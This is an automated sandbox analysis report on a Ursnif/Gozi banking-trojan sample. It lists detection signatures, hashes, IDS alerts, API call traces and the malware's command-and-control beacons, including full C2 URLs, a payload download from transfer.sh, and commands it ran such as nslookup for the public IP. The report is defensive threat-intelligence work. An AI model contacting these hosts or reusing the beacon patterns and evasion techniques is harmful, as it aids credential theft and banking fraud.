Windows Analysis Report gozi.exe

Overview

General Information

Sample Name: gozi.exe
Analysis ID: 551701
MD5: 8ee79738c37a919fdf38dc5a621556ce
SHA1: ae35e761cd1633fa8b70bda3c2e3649c1694ffd1
SHA256: 51037666d1982db93e3123e88594d409805d3f1d970e9f926dcadb99f77f50f6
Tags: exe gozi

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Tries to steal Mail credentials (via file / registry access)
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Uses nslookup.exe to query domains
Writes or reads registry keys via WMI
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
.NET source code contains potential unpacker
Sigma detected: MSHTA Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Uses ping.exe to check the status of other devices and networks
Modifies the prolog of user mode functions (user mode inline hooks)
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Modifies the import address table of user mode modules (user mode IAT hooks)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Queries the installation date of Windows
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
Compiles C# or VB.Net code
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Rundll32 Activity
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Enables debug privileges
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Csc.exe Source File Folder
Uses Microsoft's Enhanced Cryptographic Provider


AV Detection:

Antivirus detection for URL or domain
Source: http://apr.intooltak.com/lnhNHa_2Btty8CaNj/2ZI6TN22qvUD/8ZPV4upYsm_/2FN7_2B_2BUcD0/ieoqnU4qUIxSEwBSH Avira URL Cloud: Label: malware
Source: http://apr.intooltak.com/vlSm5FdhwFmMvT/YOr1y3vmv8eg4Ac3b7Y_2/BxNzh6No2PWjhu_2/Fyyb9C79h8hjmv0/0MJdM07T0vYSwv1YW8/_2F13x6Wl/Lrng4lSkMN3h4WUh3_2B/V0ttocBRKlq9AtXNAro/11M6x_2BaL1Zjx_2BWp4qX/FgWuexW_2FQbO/w_2FMf21/MXsR7_2BkMZgcjp0nVIxUlY/KUQNsPRxFs/f5vu_2BQoVI2fu6H_/2BIGCwdRzvbj/hz_2BIOSiZR/JFogKN88OOAHtb/M_2BNELxC21s15Johd0jZ/ulyOnBSm1PSraDUT/nl6kvDdqLoljmN_/2B2yicis3/ZYLr Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: gozi.exe Virustotal: Detection: 38%
Source: gozi.exe Metadefender: Detection: 40%
Source: gozi.exe ReversingLabs: Detection: 65%
Antivirus / Scanner detection for submitted sample
Source: gozi.exe Avira: detected
Machine Learning detection for sample
Source: gozi.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 8.0.RegAsm.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.gozi.exe.32857b4.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.0.RegAsm.exe.400000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.RegAsm.exe.400000.6.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.RegAsm.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.RegAsm.exe.400000.5.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.RegAsm.exe.400000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.RegAsm.exe.400000.7.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.gozi.exe.329b084.2.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.2.RegAsm.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.RegAsm.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_010A7479 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 8_2_010A7479
Source: unknown HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49743 version: TLS 1.2
Source: gozi.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: Binary string: .C:\Users\user\AppData\Local\Temp\5n300s0s.pdbXP source: powershell.exe, 00000016.00000002.586031203.000002033C29E000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: RegAsm.exe, 00000008.00000003.460334306.00000000044C0000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000003.467008744.0000000004570000.00000004.00000001.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\5n300s0s.pdb source: powershell.exe, 00000016.00000002.585929205.000002033C272000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: RegAsm.exe, 00000008.00000003.460334306.00000000044C0000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000003.467008744.0000000004570000.00000004.00000001.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\hscan34n.pdb source: powershell.exe, 00000016.00000002.585762448.000002033C236000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\5n300s0s.pdb source: powershell.exe, 00000016.00000003.533928373.000002035019D000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\New folder\bin\Debug\SLN\transport-manager\obj\Debug\transport-manager.pdb source: gozi.exe, gozi.exe, 00000002.00000000.285133625.0000000000E12000.00000002.00020000.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\hscan34n.pdbXP source: powershell.exe, 00000016.00000002.585929205.000002033C272000.00000004.00000001.sdmp
Source: Binary string: EventManager.pdb source: gozi.exe, 00000002.00000002.328151243.0000000004199000.00000004.00000001.sdmp
Source: Binary string: Local\{6FD9BC09-0238-7997-8413-56BDF8F7EA41}n.pdb source: powershell.exe, 00000016.00000003.533928373.000002035019D000.00000004.00000001.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F18409 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 8_2_03F18409
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F1B9D4 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 8_2_03F1B9D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F0E91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 8_2_03F0E91D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F22ECF lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 8_2_03F22ECF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_0303E91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 47_2_0303E91D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_0304B9D4 FindFirstFileW,FindNextFileW,FindClose,FreeLibrary, 47_2_0304B9D4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_03052ECF memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose, 47_2_03052ECF

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49751 -> 185.189.12.123:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49751 -> 185.189.12.123:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49752 -> 185.189.12.123:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49752 -> 185.189.12.123:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49754 -> 185.189.12.123:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49820 -> 185.189.12.123:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49820 -> 185.189.12.123:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: io.immontyr.com
Uses nslookup.exe to query domains
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
May check the online IP address of the machine
Source: C:\Windows\System32\nslookup.exe DNS query: name: myip.opendns.com
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /get/3dvhcv/lia.exe HTTP/1.1Host: transfer.shConnection: Keep-Alive
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /vlSm5FdhwFmMvT/YOr1y3vmv8eg4Ac3b7Y_2/BxNzh6No2PWjhu_2/Fyyb9C79h8hjmv0/0MJdM07T0vYSwv1YW8/_2F13x6Wl/Lrng4lSkMN3h4WUh3_2B/V0ttocBRKlq9AtXNAro/11M6x_2BaL1Zjx_2BWp4qX/FgWuexW_2FQbO/w_2FMf21/MXsR7_2BkMZgcjp0nVIxUlY/KUQNsPRxFs/f5vu_2BQoVI2fu6H_/2BIGCwdRzvbj/hz_2BIOSiZR/JFogKN88OOAHtb/M_2BNELxC21s15Johd0jZ/ulyOnBSm1PSraDUT/nl6kvDdqLoljmN_/2B2yicis3/ZYLr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic HTTP traffic detected: GET /g37w_2FYO/KW18Y37P4Dg_2F1TMh_2/FK2ujRayUy6lspI6qOC/AgWOSVQoUjByibFH6VxOps/v3Ehdrv875bm_/2Bs0w7UO/8HLDir_2FrS7hQvf7_2F_2F/dRVLAAfuPh/m30EKXD6FtreycZoi/lobTM_2FcJdc/YK8geqpXCxP/dDLbqs1jlQyVsA/bp_2Fxijgc04UGfwb6H7A/hHd5lPMnnVOlY1xb/cpTKFIgzAGJyGab/7_2BPVHreJHJUQdZTy/CjJC9x69g/tFYle1uxB8JrgYxIiF_2/BMgOKImH_2BEsdbiTm7/xqsfHc14yTZglOas0gOCoM/8tPVx3GttAeuK/bZvFimTpFp_2B/LS HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic HTTP traffic detected: GET /lnhNHa_2Btty8CaNj/2ZI6TN22qvUD/8ZPV4upYsm_/2FN7_2B_2BUcD0/ieoqnU4qUIxSEwBSHp3U9/VTOicK4Dg9CvfDD5/DOzqkKaYmXyqB_2/BBeVS9VS7cZ_2Bxp8N/QUqIP2qoG/d9YX0YxhQ9wrMxFsIM3_/2FpgIEySH_2F7iIla7P/RVB1W1dWGnBa303ekXLbS2/H9XWbOoIqxvpR/Y0oANlOz/wA_2FDoUg6f5pt9sPS8pXWN/S8nUx2g1cV/w178G4jzQvTUGix2J/FRZXUdQwbPuV/iCh6boYFIAo/eBnDiqYSbaisXu/CvhfCnnlGNsLFuBfY6dkH/EJQ5NM_2B10n/nvc8N HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic HTTP traffic detected: GET /cG9R2yLu/hwY1VC7UV0FGuTFHUDuWv94/dWPB0qINsS/UcOtH5ibuFGkRtRRz/TcTs3WrbL3kk/KH9_2B01P5_/2BqOCU5VAuO8RX/tDtOsh5JefONIGFgJjwJW/WTNQ_2BigLNUfSTv/vEQOtss42jXAD7m/Vb_2FBrZFcmnzVx4eL/FgvV_2F2J/WJxkKD87XHV59J1BIptx/grHAayUrM6ZXOpWMd4b/m8CaZcQ61hUgT0Er2sN6yR/jqxJkoogaoGBQ/oxZTsR50/IU6qlhp0LlHnTmpxFkzazjn/ZXLdcjlESY/R9eDED1XHAy_2FpXA/QYirrLarjNjS/_2Faftuam8rF_2F/1Ew HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: io.immontyr.com
Source: global traffic HTTP traffic detected: POST /NmtPFuQd_2/BfdLYLn2BLCtH1Hsh/hg_2FVLDGfIg/gtHnWY07UvK/_2FGfiZdkTNp3n/qSVe2e02NbQuSngndCWZx/FHtx2JyPoVSWyJAF/Nf3MxwobjdKHeJw/QN32g1hXKaTKdLZpGQ/1rai86tHa/cARCkcyc0ZIXwpr6o7hy/9LscnpzGSQw_2BN65St/d5vH28LuyC5fwk6W58_2BJ/mW_2BjaYyboIc/4qfAAbea/H6DnQT_2FBDJuaMwLw_2Bis/Q5vm9_2Bsb/WNMn_2Bg9zRAyx8QD/EwO5ty_2BWJe/AeEgVlXP8KP/mEQSv1dRw/v0fxMe2Myiu1T/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Content-Length: 2Host: io.immontyr.com
Source: unknown DNS traffic detected: queries for: transfer.sh
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown HTTP traffic detected: POST /NmtPFuQd_2/BfdLYLn2BLCtH1Hsh/hg_2FVLDGfIg/gtHnWY07UvK/_2FGfiZdkTNp3n/qSVe2e02NbQuSngndCWZx/FHtx2JyPoVSWyJAF/Nf3MxwobjdKHeJw/QN32g1hXKaTKdLZpGQ/1rai86tHa/cARCkcyc0ZIXwpr6o7hy/9LscnpzGSQw_2BN65St/d5vH28LuyC5fwk6W58_2BJ/mW_2BjaYyboIc/4qfAAbea/H6DnQT_2FBDJuaMwLw_2Bis/Q5vm9_2Bsb/WNMn_2Bg9zRAyx8QD/EwO5ty_2BWJe/AeEgVlXP8KP/mEQSv1dRw/v0fxMe2Myiu1T/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Content-Length: 2Host: io.immontyr.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match File source: 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.392490032.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000003.672226246.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000003.671882459.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.392591901.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000003.671987567.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.392517903.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000003.672047552.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.392607938.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000003.671936053.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.473486452.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.540930276.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.392570642.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000003.672143247.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.473394409.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.541170125.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.473504593.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.405030349.000000000320C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.392542209.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.395416668.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000003.672170468.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000002.673705435.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_010A7479 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 8_2_010A7479

System Summary:

Writes or reads registry keys via WMI
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Detected potential crypto function
Source: C:\Users\user\Desktop\gozi.exe Code function: 2_2_0304C124 2_2_0304C124
Source: C:\Users\user\Desktop\gozi.exe Code function: 2_2_0304E56A 2_2_0304E56A
Source: C:\Users\user\Desktop\gozi.exe Code function: 2_2_0304E570 2_2_0304E570
Source: C:\Users\user\Desktop\gozi.exe Code function: 2_2_07C27060 2_2_07C27060
Source: C:\Users\user\Desktop\gozi.exe Code function: 2_2_07C26030 2_2_07C26030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_010A7F60 8_2_010A7F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_010A6B67 8_2_010A6B67
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_010A6DD3 8_2_010A6DD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F163BC 8_2_03F163BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F1A241 8_2_03F1A241
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F1F1EE 8_2_03F1F1EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F178F1 8_2_03F178F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F0C086 8_2_03F0C086
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F0504A 8_2_03F0504A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F1CF97 8_2_03F1CF97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F095FE 8_2_03F095FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F09D64 8_2_03F09D64
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F034DC 8_2_03F034DC
Source: C:\Windows\System32\control.exe Code function: 28_2_00E7AB44 28_2_00E7AB44
Source: C:\Windows\System32\control.exe Code function: 28_2_00E7B58C 28_2_00E7B58C
Source: C:\Windows\System32\control.exe Code function: 28_2_00E686D0 28_2_00E686D0
Source: C:\Windows\System32\control.exe Code function: 28_2_00E640E8 28_2_00E640E8
Source: C:\Windows\System32\control.exe Code function: 28_2_00E568FC 28_2_00E568FC
Source: C:\Windows\System32\control.exe Code function: 28_2_00E54080 28_2_00E54080
Source: C:\Windows\System32\control.exe Code function: 28_2_00E53890 28_2_00E53890
Source: C:\Windows\System32\control.exe Code function: 28_2_00E79858 28_2_00E79858
Source: C:\Windows\System32\control.exe Code function: 28_2_00E68024 28_2_00E68024
Source: C:\Windows\System32\control.exe Code function: 28_2_00E78820 28_2_00E78820
Source: C:\Windows\System32\control.exe Code function: 28_2_00E65828 28_2_00E65828
Source: C:\Windows\System32\control.exe Code function: 28_2_00E62804 28_2_00E62804
Source: C:\Windows\System32\control.exe Code function: 28_2_00E6B008 28_2_00E6B008
Source: C:\Windows\System32\control.exe Code function: 28_2_00E6A808 28_2_00E6A808
Source: C:\Windows\System32\control.exe Code function: 28_2_00E531D4 28_2_00E531D4
Source: C:\Windows\System32\control.exe Code function: 28_2_00E66190 28_2_00E66190
Source: C:\Windows\System32\control.exe Code function: 28_2_00E6194B 28_2_00E6194B
Source: C:\Windows\System32\control.exe Code function: 28_2_00E5B154 28_2_00E5B154
Source: C:\Windows\System32\control.exe Code function: 28_2_00E75954 28_2_00E75954
Source: C:\Windows\System32\control.exe Code function: 28_2_00E652CC 28_2_00E652CC
Source: C:\Windows\System32\control.exe Code function: 28_2_00E512BC 28_2_00E512BC
Source: C:\Windows\System32\control.exe Code function: 28_2_00E67BFC 28_2_00E67BFC
Source: C:\Windows\System32\control.exe Code function: 28_2_00E53BA4 28_2_00E53BA4
Source: C:\Windows\System32\control.exe Code function: 28_2_00E72BA0 28_2_00E72BA0
Source: C:\Windows\System32\control.exe Code function: 28_2_00E72330 28_2_00E72330
Source: C:\Windows\System32\control.exe Code function: 28_2_00E5DCA8 28_2_00E5DCA8
Source: C:\Windows\System32\control.exe Code function: 28_2_00E6CCA8 28_2_00E6CCA8
Source: C:\Windows\System32\control.exe Code function: 28_2_00E644B4 28_2_00E644B4
Source: C:\Windows\System32\control.exe Code function: 28_2_00E5C49C 28_2_00E5C49C
Source: C:\Windows\System32\control.exe Code function: 28_2_00E6BC10 28_2_00E6BC10
Source: C:\Windows\System32\control.exe Code function: 28_2_00E59DF0 28_2_00E59DF0
Source: C:\Windows\System32\control.exe Code function: 28_2_00E78DA0 28_2_00E78DA0
Source: C:\Windows\System32\control.exe Code function: 28_2_00E7C588 28_2_00E7C588
Source: C:\Windows\System32\control.exe Code function: 28_2_00E77D6C 28_2_00E77D6C
Source: C:\Windows\System32\control.exe Code function: 28_2_00E60544 28_2_00E60544
Source: C:\Windows\System32\control.exe Code function: 28_2_00E74530 28_2_00E74530
Source: C:\Windows\System32\control.exe Code function: 28_2_00E6751C 28_2_00E6751C
Source: C:\Windows\System32\control.exe Code function: 28_2_00E5A6D0 28_2_00E5A6D0
Source: C:\Windows\System32\control.exe Code function: 28_2_00E77EA0 28_2_00E77EA0
Source: C:\Windows\System32\control.exe Code function: 28_2_00E73E2C 28_2_00E73E2C
Source: C:\Windows\System32\control.exe Code function: 28_2_00E61618 28_2_00E61618
Source: C:\Windows\System32\control.exe Code function: 28_2_00E737D0 28_2_00E737D0
Source: C:\Windows\System32\control.exe Code function: 28_2_00E78FA8 28_2_00E78FA8
Source: C:\Windows\System32\control.exe Code function: 28_2_00E57F64 28_2_00E57F64
Source: C:\Windows\System32\control.exe Code function: 28_2_00E5CF44 28_2_00E5CF44
Source: C:\Windows\System32\control.exe Code function: 28_2_00E69740 28_2_00E69740
Source: C:\Windows\System32\control.exe Code function: 28_2_00E6FF4C 28_2_00E6FF4C
